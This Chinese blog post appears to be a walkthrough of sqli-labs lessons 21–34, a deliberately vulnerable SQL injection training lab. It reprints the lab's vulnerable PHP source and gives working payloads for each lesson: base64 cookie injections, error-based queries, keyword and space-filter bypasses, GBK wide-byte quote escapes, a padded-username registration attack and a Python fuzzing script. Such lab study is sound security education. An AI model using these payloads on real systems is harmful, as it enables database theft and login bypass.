
chrysanthemum 2019-10-06 11:51 原文

Less-21:括号+单引号绕过+base64cookie编码

总感觉我已经把sql注入做成代码审计了:P

  1 <?php
// Less-21 (sqli-labs): cookie-based login page.  Without a "uname" cookie it
// renders a login form and checks the POSTed credentials; with the cookie it
// base64-decodes the cookie value and looks the user up again.  Only the POST
// path goes through check_input(); the cookie path interpolates the decoded
// value straight into SQL (line 132 below), which is the injection point this
// lesson is about.  Parameter binding would close it on both paths.
// The mysql_* extension used throughout was removed in PHP 7.
  2 //including the Mysql connect parameters.
  3 include("../sql-connections/sql-connect.php");
  4 if(!isset($_COOKIE['uname']))
  5 {
  6     //including the Mysql connect parameters.
  7     include("../sql-connections/sql-connect.php"); // included a second time; redundant with line 3
  8 
  9     echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome&nbsp;&nbsp;&nbsp;<font color='#FF0000'> Dhakkan </font><br></div>";
 10     echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
 11     echo "<div style='padding-top:10px; font-size:15px;'>";
 12 
 13 
 14     echo "<!--Form to post the contents -->";
 15     echo '<form action=" " name="form1" method="post">';
 16 
 17     echo ' <div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;';
 18     echo '   <input type="text"  name="uname" value=""/>  </div>';
 19 
 20     echo ' <div> Password : &nbsp; &nbsp; &nbsp;';
 21     echo '   <input type="text" name="passwd" value=""/></div></br>';
 22     echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
 23 
 24     echo '</form>';
 25     echo '</div>';
 26     echo '</div>';
 27     echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
 28     echo '<font size="3" color="#FFFF00">';
 29     echo '<center><br><br><br>';
 30     echo '<img src="../images/Less-21.jpg" />';
 31     echo '</center>';
 32 
    /**
     * Prepare one POSTed credential for the login query: cut it to 20 bytes,
     * undo magic_quotes escaping when that ini option is on
     * (get_magic_quotes_gpc() was removed in PHP 8), then either quote it and
     * escape it with mysql_real_escape_string() or, for all-digit input,
     * cast it to int.  The result is already quoted, which is why the query
     * on line 64 embeds $uname and $passwd without surrounding quotes.
     *
     * @param string $value raw request value
     * @return string|int quoted-and-escaped string, or an int for digit-only input
     */
 33     function check_input($value)
 34     {
 35         if(!empty($value))
 36         {
 37             $value = substr($value,0,20); // truncation (see comments)
 38         }
 39         if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
 40         {
 41             $value = stripslashes($value);
 42         }
 43         if (!ctype_digit($value))       // Quote if not a number
 44         {
 45             $value = "'" . mysql_real_escape_string($value) . "'";
 46         }
 47         else
 48         {
 49             $value = intval($value);
 50         }
 51        
 52         return $value;
 53     }
 54     echo "<br>";
 55     echo "<br>";
 56     if(isset($_POST['uname']) && isset($_POST['passwd']))
 57     {
 58 
 59         echo "<h1>hello master*****************************************************************************************</h1>";
 60 
 61         $uname = check_input($_POST['uname']);
 62         $passwd = check_input($_POST['passwd']);
 63 
 64         $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; // values pre-quoted by check_input(); the escaping is the only barrier here
 65         $result1 = mysql_query($sql);
 66         $row1 = mysql_fetch_array($result1);
 67 
 68         echo "\n<h1>hello#####################################################################################################333</h1>\n";
 69         if($row1)
 70         {
 71             echo '<font color= "#FFFF00" font size = 3 >';
 72             setcookie('uname', base64_encode($row1['username']), time()+3600); // the "session" is just base64(username): anyone can forge it
 73 
 74             echo "I LOVE YOU COOKIES";
 75             echo "</font>";
 76             echo '<font color= "#0000ff" font size = 3 >';
 77             echo 'Your Cookie is: ' .$cookee; // $cookee is never assigned on this branch (only on line 108), so this prints an empty value
 78             echo "</font>";
 79             echo "<br>";
 80             print_r(mysql_error());
 81             echo "<br><br>";
 82             echo '<img src="../images/flag.jpg" />';
 83             echo "<br>";
 84             header ('Location: index.php'); // output was already sent above: this redirect only takes effect with output buffering
 85         }
 86         else
 87         {
 88             echo '<font color= "#0000ff" font size="3">';
 89             echo "Try again looser";
 90             print_r(mysql_error()); // raw DB error text sent to the client
 91             echo "</br>";
 92             echo "</br>";
 93             echo '<img src="../images/slap.jpg" />';
 94             echo "</font>";
 95         }
 96     }
 97 
 98     echo "</font>";
 99     echo '</font>';
100     echo '</div>';
101 
102 }
103 else
104 {
105 
106     if(!isset($_POST['submit']))
107     {
108         $cookee = $_COOKIE['uname']; // attacker-controlled from here on
109 
110         echo "<h1>hello master$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</h1>";
111 
112         $format = 'D d M Y - H:i:s';
113         $timestamp = time() + 3600;
114         
115         echo "<center>";
116         echo "<br><br><br><b>";
117         echo '<img src="../images/Less-21.jpg" />';
118         echo "<br><br><b>";
119         echo '<br><font color= "red" font size="4">';
120         echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT']; // request header echoed without htmlspecialchars()
121         echo "</font><br>";
122         echo '<font color= "cyan" font size="4">';
123         echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
124         echo "</font><br>";
125         echo '<font color= "#FFFF00" font size = 4 >';
126         echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
127         echo '<font color= "orange" font size = 5 >';
128         echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); // cookie echoed without htmlspecialchars(); the expiry shown is computed here, not read from the cookie
129 
130         $cookee = base64_decode($cookee);
131         echo "<br></font>";
132         $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"; // INJECTION POINT: the decoded cookie enters the query with no escaping or binding
133         $result=mysql_query($sql);
134 
135         if (!$result)
136         {
137             die('Issue with your mysql: ' . mysql_error()); // raw DB error text sent to the client
138         }
139         $row = mysql_fetch_array($result);
140         if($row)
141         {
142             echo '<font color= "pink" font size="5">';
143             echo 'Your Login name:'. $row['username'];
144             echo "<br>";
145             echo '<font color= "grey" font size="5">';
146             echo 'Your Password:' .$row['password']; // stored password displayed in clear (lab only)
147             echo "</font></b>";
148             echo "<br>";
149             echo 'Your ID:' .$row['id'];
150         }
151         else
152         {
153             echo "<center>";
154             echo '<br><br><br>';
155             echo '<img src="../images/slap1.jpg" />';
156             echo "<br><br><b>";
157             //echo '<img src="../images/Less-20.jpg" />';
158         }
159         echo '<center>';
160         echo '<form action="" method="post">';
161         echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
162         echo '</form>';
163         echo '</center>';
164     }
165     else
166     {
167         echo '<center>';
168         echo "<br>";
169         echo "<br>";
170         echo "<br>";
171         echo "<br>";
172         echo "<br>";
173         echo "<br>";
174         echo '<font color= "#FFFF00" font size = 6 >';
175         echo " Your Cookie is deleted";
176         setcookie('uname', base64_encode($row1['username']), time()-3600); // $row1 is undefined on this branch; the past expiry is what actually clears the cookie
177         header ('Location: index.php'); // same headers-already-sent caveat as line 84
178         echo '</font></center></br>';
179 
180     }
181 
182 
183     echo "<br>";
184     echo "<br>";
185     //header ('Location: main.php');
186     echo "<br>";
187     echo "<br>";
188 
189     //echo '<img src="../images/slap.jpg" /></center>';
190     //logging the connection parameters to a file for analysis.
191     $fp=fopen('result.txt','a'); // appends the raw cookie value to a file resolved relative to the working directory (normally this script's directory); untrusted data on disk, and fopen() failure is not checked
192     fwrite($fp,'Cookie:'.$cookee."\n");
193 
194     fclose($fp);
195 
196 }
197 ?>
源码+一点点小增加

注意点:

  • 不要submit参数

  • cookie要有一个uname的参数

  • cookie的参数要base64编码过的

  •  绕过条件是括号加单引号

查数据库:

uname=YWRtaW4nKSAgYW5kIChzZWxlY3QgMSBmcm9tIChzZWxlY3QgY291bnQoKiksY29uY2F0X3dzKCctJywoc2VsZWN0IGRhdGFiYXNlKCkpLGZsb29yKHJhbmQoMCkqMikpIGFzIGEgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IGEpIGIpIw==

查数据表:

uname=YWRtaW4nKSB1bmlvbiAoU0VMRUNUICogRlJPTSAoU0VMRUNUIG5hbWVfY29uc3QoKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwxKSxuYW1lX2NvbnN0KChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSksMSkpIGEpIw==

 


Less-22:双引号绕过+21套路

查数据表:

payload:admin" union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)#

Cookie:uname=YWRtaW4iIHVuaW9uIChTRUxFQ1QgKiBGUk9NIChTRUxFQ1QgbmFtZV9jb25zdCgoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkpLDEpLG5hbWVfY29uc3QoKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwxKSkgYSkj


Less-23:普通的注入+get

这里貌似用不了注释,但是可以用逻辑绕过

?id=-1' union select 1,2,3 and '1

 

 

 ?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 and '1


Less-24:约束攻击

hint:

利用:假设我们只知道一个账号 "admin" , 然后在注册那里创建新用户 

username=admin                                                                            ***&password=i hack you&re_password=i hack you&submit=Register

 然后就可以用 “admin”(账号) 和 “i hack you” (密码)登陆了


Less-25:对and or进行了绕过

这里我用的是 “ regexp” 代替 “ and ” 

双写也可以:?id=-1' union select 1,(select group_concat(table_name) from infoORrmation_schema.tables where table_schema=database()),database() --+


Less-25a:和25一样不过他不用加'

?id=1 regexp 0 与  ?id=1 regexp 1 回显不同判断可注入

?id=-1 union select 1,database(),(select group_concat(table_name) from infoORrmation_schema.tables where table_schema=database())--+


Less-26:空格过滤

参考:Sqli-Labs:Less 26 - Less 26a

在 Windows 下会有无法用特殊字符代替空格的问题,这是 Apache 解析的问题,Linux 下无这个问题。下面是根据网上的一位师傅的脚本改的,用来判断哪些 URL 编码可以代替空格

'''
@Modify Time      @Author  判断哪些 URL 编码能够代替空格
------------      -------
2019/10/6 13:34   laoalo  python3版本
'''
import requests
from lxml import etree

def changeToHex(num):
    """Return ``num`` as a percent-encoded byte, e.g. ``10`` -> ``'%0a'``.

    The hex digits are left-padded with ``0`` to two characters so that
    values below 16 still form a complete URL escape sequence.
    """
    digits = hex(num).replace("0x", "")
    return "%" + digits.zfill(2)

req = requests.session()

# Try every single-byte percent-encoding as the separator around "&&"; the lab
# page shows "Dumb" inside <font size="5"> when the query still parsed, so the
# bytes printed below are the ones the server accepted in place of a space.
for code in range(0, 256):
    i = changeToHex(code)
    url = "http://192.168.199.190/sqli-labs-master/Less-26/?id=1'" + i + "%26%26" + i + "'1'='1"
    ret = req.get(url).text
    matches = etree.HTML(ret).xpath("//font[@size='5']/text()")
    if matches and matches[0][-4:-1] == 'Dum':
        print("good,this can use:" + i)
#python2版本
# import requests
#
# def changeToHex(num):
#     tmp = hex(i).replace("0x", "")
#     if len(tmp)<2:
#         tmp = '0' + tmp
#     return "%" + tmp
#
# req = requests.session()
# for i in range(0,256):
#     i = changeToHex(i)
#     # url = 'http://192.168.199.190/sqli-labs-master/Less-26/?id=1"' + i + 'regexp' + i + '"1"--+'
#     # url = "http://192.168.199.190/sqli-labs-master/Less-26/?id=1'" + i + "%26%26" + i + "'1'='1"
#     ret = req.get(url)
#     if 'Dumb' in ret.content:
#         print "good,this can use:" + i
判断哪些 URL 编码能够代替空格

 PS:虽然可以爆破出来,但还是需要一个一个实验,有的在其他构造中会有特殊含义所以是不能用的;经我测试在 Windows 中也是可以的

D:\大蟒蛇\python.exe C:/1.py
good,this can use:%09
good,this can use:%0a
good,this can use:%0b
good,this can use:%0c
good,this can use:%0d
good,this can use:%20
good,this can use:%22
good,this can use:%23
good,this can use:%27
good,this can use:%2a
good,this can use:%2d
good,this can use:%2f
good,this can use:%5c
good,this can use:%a0

Process finished with exit code 0

回显不同判断出单引号:?id=0'%a0aandnd%a0'1 和 ?id=1'%a0aandnd%a0'1

?id=0'%a0union%a0select%a02,group_concat(table_name),3%a0from%a0infoORrmation_schema.tables%a0where%a0table_schema=database()%a0aandnd%a0'1

 还有一个坑点就是不要用 " id=-1  “


 Less-26a:小括号

?id=2'aandnd'1'='1,回显的是第一条语句,说明查询条件是 “ where id=( '$id' ) ”,存在小括号。

 ( '2' and '1' = '1' )  ===》(1)===》“ where id=1 ”

('2') and '1'=('1') ===》 “ where id=2 and 1” ===》" where id=2 " 

?id=0')%a0union%a0select%a01,group_concat(table_name),2%a0from%a0infoORrmation_schema.tables%a0where%a0table_schema=database()%a0aandnd%a0'1'=('1

参考:Sqli-Labs:Less 26 - Less 26a

0x01. 如何判断注入类型与过滤条件

在没有过滤时,第一件事是判断注入类型,是字符型还是数字型。而有过滤时,判断注入类型后最重要的就是判断过滤条件。

  • 在 Less 25 与 Less 26 中,既有正确回显,也有错误回显。找到注入类型后在构造的错误回显前加上字符便可依次看出过滤了哪些字符。
  • 在 Less 25a 与本关中,错误回显被关闭,找到过滤字符便很重要,不过大体与有错误回显时相同(因为有正确回显)。

我们知道有一个函数是intval(),作用是获取变量的整数值。但无错误回显时,我们如何区分是被过滤还是被转为整型呢?

intval('#1') = 0
intval('1') = 1

只需要在 1 前面加上 #,若被过滤则会正常显示,被转为整型则会为 0

 

步骤1:注入类型

11"正常回显,1'报错,判断为字符型,但是还要判断是否有小括号

判断小括号有几种方法:

2'&&'1'='1

若查询语句为where id='$id',查询时是where id='2'&&'1'='1',结果是where id='2',回显会是id=2

若查询语句为where id=('$id'),查询时是where id=('2'&&'1'='1'),MySQL 将'2'作为了 Bool 值,结果是where id=('1'),回显会是id=1

1')||'1'=('1

若查询语句有小括号正确回显,若无小括号错误回显(无回显)。


Less-27:单引号+union+select过滤

?id=1'and'0 与 ?id=1'and'1 :不同回显得到单引号绕。双写绕过滤。话说password是不是还有所处理database()结果没有回显。

?id=0'%a0ununionion%a0selSELECTect%a01,(selSELECTect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()%a0and%a0'1


 Less-27a:双引号

?id=1"and"0 和 ?id=1"and"1:回显不同得到双引号。

?id=0"%a0ununionion%a0selSELECTect%a01,(selSELECTect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()%a0and%a0"1


Less-28:GET - Error Based- All your UNION & SELECT Belong to us - String -single quote with parenthesis

?id=1'and'1 ,?id=1'and'0 :回显不同得到单引号闭合

?id=2'and'1'='1 :回显第一条数据,说明存在小括号

?id=0')%0cunion(select%0c1,(select%0cgroup_concat(table_name)%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()),'database()


Less-28a: GET - Blind Based- All your UNION & SELECT Belong to us -single quote-parenthesis

?id=1'and'0 , ?id=1'and'0 : 单引号闭合

?id=3'and'1 :回显第一条数据,小括号闭合

?id=0')%0bunion%0bselect%0b1,group_concat(table_name),database()%0bfrom information_schema.tables%0bwhere%0btable_schema=database()%0band ('1


Less-29:Less-29 Protection with WAFGET -Error based- IMPIDENCE MISMATCH- Ha ...

 ?id=1'and'0 , ?id=1'and'1 : 回显不同,单引号绕过

?id=2' order by 4--+ : 根据回显只有三列

?id=0' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+ 好吧没看出来它的waf在哪里○| ̄|_  :

查一下源码,index.php,hacked.php里面都没什么,就login.php里面有两个特殊的函数:

<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<TITLE>Less-29 WAF BYPASS</TITLE>
</HEAD>
<body bgcolor="#000000">
<div style=" margin-top:50px;color:#FFF; font-size:40px; text-align:center"><font color="#FF0000">
<center>
<img src="../images/slap1.jpg">
<br>
<br>
<font size="4">
<a href="login.php">Go Back and Try again</a>
</font>

<br>
<br>
<img src="../images/waf.jpg">
<br>

</center>
</body>
</html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-29 Protection with WAF</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
//disable error reporting
error_reporting(0);

// take the variables
// Less-29: the check and the query look at two different parses of the same
// request.  whitelist() sees $id1, the value java_implimentation() cut from
// the raw query string (first "id" piece wins, 30 characters); the query uses
// $_GET['id'], where PHP keeps the LAST duplicate parameter.  whitelist() also
// does not stop the script after its redirect, so the query below still runs.
// Validate the exact value you are about to use, and bind it.
if(isset($_GET['id']))
{
        $qs = $_SERVER['QUERY_STRING'];
        $hint=$qs;                      // echoed back further down the page
        $id1=java_implimentation($qs);
                                        /**
                                         * java_implimentation($qs): up to 30 characters of the value of the
                                         * first "id" parameter in the raw query string
                                         */
        $id=$_GET['id'];                // what the query actually uses; never checked
        //echo $id1;
        whitelist($id1);
                                        /** whitelist($id1);
                                         * regex check on $id1 only: those 30 characters must all be digits
                                         */

        //logging the connection parameters to a file for analysis.
        $fp=fopen('result.txt','a');    // raw request value appended to a file beside the script; fopen() failure is not checked
        fwrite($fp,'ID:'.$id."\n");
        fclose($fp);

// connectivity
        $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // unescaped, unchecked $id interpolated into the query
        $result=mysql_query($sql);
        $row = mysql_fetch_array($result);
        if($row)
        {
                echo "<font size='5' color= '#99FF00'>";
                echo 'Your Login name:'. $row['username'];
                echo "<br>";
                echo 'Your Password:' .$row['password'];        // stored password shown in clear (lab only)
                echo "</font>";
        }
        else
        {
                echo '<font color= "#FFFF00">';
                print_r(mysql_error());                         // raw DB error text sent to the client
                echo "</font>";
        }
}
else 
{ 
    echo "Please input the ID as parameter with numeric value";
}

//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
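/**
 * Reject the request unless $input consists of decimal digits only.
 *
 * On a mismatch the client is redirected to hacked.php and the script is
 * terminated.  The exit matters: header() only queues the response header,
 * so without it control would return to the caller, which goes on to run
 * its query with the value that was just rejected.  The pattern is anchored
 * with \z rather than $ so that a trailing newline cannot slip past it.
 *
 * @param string $input candidate id value
 * @return void returns only when the input is accepted
 */
function whitelist($input)
{
        if (!preg_match('/^\d+\z/', $input))
        {
                header('Location: hacked.php');
                exit;
        }
}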

// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
/**
 * Pick the id value out of a raw query string the way a "first occurrence
 * wins" parser would: the string is split on '&', the first piece whose
 * first two bytes are "id" is taken as the id parameter, and the 30 bytes
 * after its separator are returned.  Returns null when no such piece exists.
 *
 * PHP's own $_GET keeps the LAST duplicate parameter, so this value and
 * $_GET['id'] can disagree when id= appears more than once.
 *
 * @param string $query_string raw $_SERVER['QUERY_STRING']
 * @return string|null
 */
function java_implimentation($query_string)
{
        foreach (explode("&", $query_string) as $pair)
        {
                // Only the first two bytes are compared, so a name such as "idx" also matches.
                if (substr($pair, 0, 2) === "id")
                {
                        return substr($pair, 3, 30);
                }
        }
        return null;
}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-29.jpg" />
</br>
</br>
</br>
<img src="../images/Less-29-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
    // The raw query string is reflected into the page without htmlspecialchars().
    echo 'Hint: The Query String you input is: ' . $hint;
?>
<br>
<br>
Reference:
<br>
<a href="https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf">AppsecEU09_CarettoniDiPaola_v0.8.pdf</a><br>
<a href="https://community.qualys.com/servlet/JiveServlet/download/38-10665/Protocol-Level Evasion of Web Application Firewalls v1.1 (18 July 2012).pdf">https://community.qualys.com/servlet/JiveServlet/download/38-10665/Protocol-Level Evasion of Web Application Firewalls v1.1 (18 July 2012).pdf</a>

</font>
</center>
</body>
</html>

 既然过滤还是比较严格的,那为什么?后来在login里加了一个回显:

 所以说是没有用这个login.php吗...


Less-30:

?id=1" and "0 ?id=1" and "1 : 双引号闭合

?id=1" order by 4--+ , ?id=1" order by 3--+ : 列数为3

?id=-1" union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

 感觉是不是我的靶场出问题了○| ̄|_,莫名的轻松。


Less-31:

?id=2")--+ : 双引号 ,与括号闭合

?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+


Less-32:宽字节注入

终于有过滤了,我居然有点开心Orz,查了一下源码,发现这里超级强大的strToHex函数原来只是一个幌子啊

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-32 **Bypass addslashes()**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function check_addslashes($string)
{
            /**
             * Hand-rolled addslashes(): prefixes every backslash, single quote
             * and double quote with a backslash.  preg_quote() builds the
             * pattern for the backslash (it escapes PCRE metacharacters in a
             * literal) and preg_replace() performs each substitution; the
             * original comment quoted the PHP manual entries for both.
             *
             * Differences from addslashes(): NUL bytes are left alone.  Like
             * addslashes() it works byte-wise, and the connection below is
             * switched to a multi-byte charset ("SET NAMES gbk"), so an
             * inserted 0x5C byte can be read as the second half of a two-byte
             * character and the quote after it is left bare -- the bypass this
             * lesson is about.  Charset-aware escaping through the driver, or
             * prepared statements, is the fix for real code.
             *
             * @param string $string raw request value
             * @return string escaped copy
             */
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash

                
    return $string;
}

// take the variables
if(isset($_GET['id']))
{
    $id=check_addslashes($_GET['id']);
                                        /**check_addslashes($_GET['id'])
                                         * backslash-escapes the quotes (and backslashes) in the value, byte by byte
                                         */
    //echo "The filtered request is :" .$id . "<br>";

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');      // raw request value appended to a file beside the script; fopen() failure is not checked
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity

    mysql_query("SET NAMES gbk");     // server-side switch to a multi-byte charset, made after the byte-wise escaping above
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // escaped value interpolated into the query; the escaping is the only barrier
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);   // a failed query is not detected here; mysql_error() is only printed in the else branch

    if($row)
    {
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];   // stored password shown in clear (lab only)
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());                    // raw DB error text sent to the client
        echo "</font>";
    }
}
else 
{ 
    echo "Please input the ID as parameter with numeric value";
}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-32.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php

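/**
 * Hex-encode every byte of $string, two lowercase digits per byte.
 *
 * bin2hex() replaces the per-byte dechex(ord()) loop because dechex() does
 * not zero-pad: bytes below 0x10 produced a single digit, so for example
 * "\x01\x23" and "\x12\x03" could not be told apart in the hint output.
 *
 * @param string $string arbitrary bytes
 * @return string hex representation, empty for an empty input
 */
function strToHex($string)
{
    return bin2hex($string);
}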
// Echo the escaped id back as a hint, followed by its byte-wise hex dump.
$escapedHint = "Hint: The Query String you input is escaped as : " . $id . "<br>";
$hexHint = "The Query String you input in Hex becomes : " . strToHex($id) . "<br>";
echo $escapedHint;
echo $hexHint;

?>
</center>
</font>
</body>
</html>

 这里用 %E4 来和后来插入的 \ 构成一个汉字进而释放 ‘ 

1 <?php
2     echo urlencode("中"); // outputs: %E4%B8%AD
3     echo urlencode("\\'");// outputs: %5C%27
4     echo urldecode("%E4%5c%27");// outputs: �\'  -- the author's point: under GBK the 0xE4 byte pairs with the 0x5C backslash into one character, leaving the quote bare
5 ?>

?id=0%E4' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()--+

 


 Less-33:

有点尴尬的是我居然用32的payload做出33的题。

?id=1%E4' and 1--+?id=1%E4' and 0--+  :单引号闭合

还好他后台的过滤是不一样的,33用了一个addslashes函数

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-32 **Bypass addslashes()**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
                                            
/**
 * Wrapper around addslashes(): prefixes ' " \ and NUL with a backslash.
 * The escaping is byte-wise and knows nothing about the connection
 * charset; prepared statements (or charset-aware driver escaping) are the
 * real fix.
 *
 * @param string $string raw request value
 * @return string escaped copy
 */
function check_addslashes($string)
{
    return addslashes($string);
}

// take the variables
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);   // byte-wise addslashes(); see check_addslashes() above
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');         // raw request value appended to a file beside the script; fopen() failure is not checked
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity

mysql_query("SET NAMES gbk");        // server-side switch to a multi-byte charset, made after the escaping above
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // escaped value interpolated into the query; the escaping is the only barrier
$result=mysql_query($sql);
$row = mysql_fetch_array($result);   // a failed query is not detected here; mysql_error() is only printed in the else branch

        if($row)
        {
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];   // stored password shown in clear (lab only)
        echo "</font>";
        }
        else
        {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());                    // raw DB error text sent to the client
        echo "</font>";
        }
}
        else { echo "Please input the ID as parameter with numeric value";}



?>
</font> </div></br></br></br><center>
<img src="../images/Less-33.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
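/**
 * Hex-encode every byte of $string, two lowercase digits per byte.
 *
 * bin2hex() replaces the per-byte dechex(ord()) loop because dechex() does
 * not zero-pad: bytes below 0x10 produced a single digit, so for example
 * "\x01\x23" and "\x12\x03" could not be told apart in the hint output.
 *
 * @param string $string arbitrary bytes
 * @return string hex representation, empty for an empty input
 */
function strToHex($string)
{
    return bin2hex($string);
}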
// Echo the escaped id back as a hint, followed by its byte-wise hex dump.
$escapedHint = "Hint: The Query String you input is escaped as : " . $id . "<br>";
$hexHint = "The Query String you input in Hex becomes : " . strToHex($id);
echo $escapedHint;
echo $hexHint;
?>
</center>
</font>
</body>
</html>

addslashes ( string $str ) : string

  • 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。 一个使用 addslashes() 的例子是当你要往数据库中输入数据时。 例如,将名字 O'reilly 插入到数据库中,这就需要对其进行转义。仅仅是为了获取插入数据库的数据,额外的 \ 并不会插入。 当 PHP 指令 magic_quotes_sybase 被设置成 on 时,意味着插入 ' 时将使用 ' 进行转义。
  • PHP 5.4 之前 PHP 指令 magic_quotes_gpc 默认是 on, 实际上所有的 GET、POST 和 COOKIE 数据都用被 addslashes() 了。 不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。 遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。
  •  参数: str: 要转义的字符。
  • 返回值:   返回转义后的字符。
  • 范例:
1 Example #1 一个 addslashes() 例子
2 <?php
3            $str = "Is your name O'reilly?";
4             // Output: Is your name O\'reilly?
5             echo addslashes($str);
6 ?>

 Less-34:对用户名和密码都进行了addslashes()

这里的连接词要用or,%df后的用户名一定是不对的

uname=admin%df' or 1--+&passwd=1--+ ,uname=admin%df' or 0--+&passwd=1--+ :回显不同得到单引号闭合

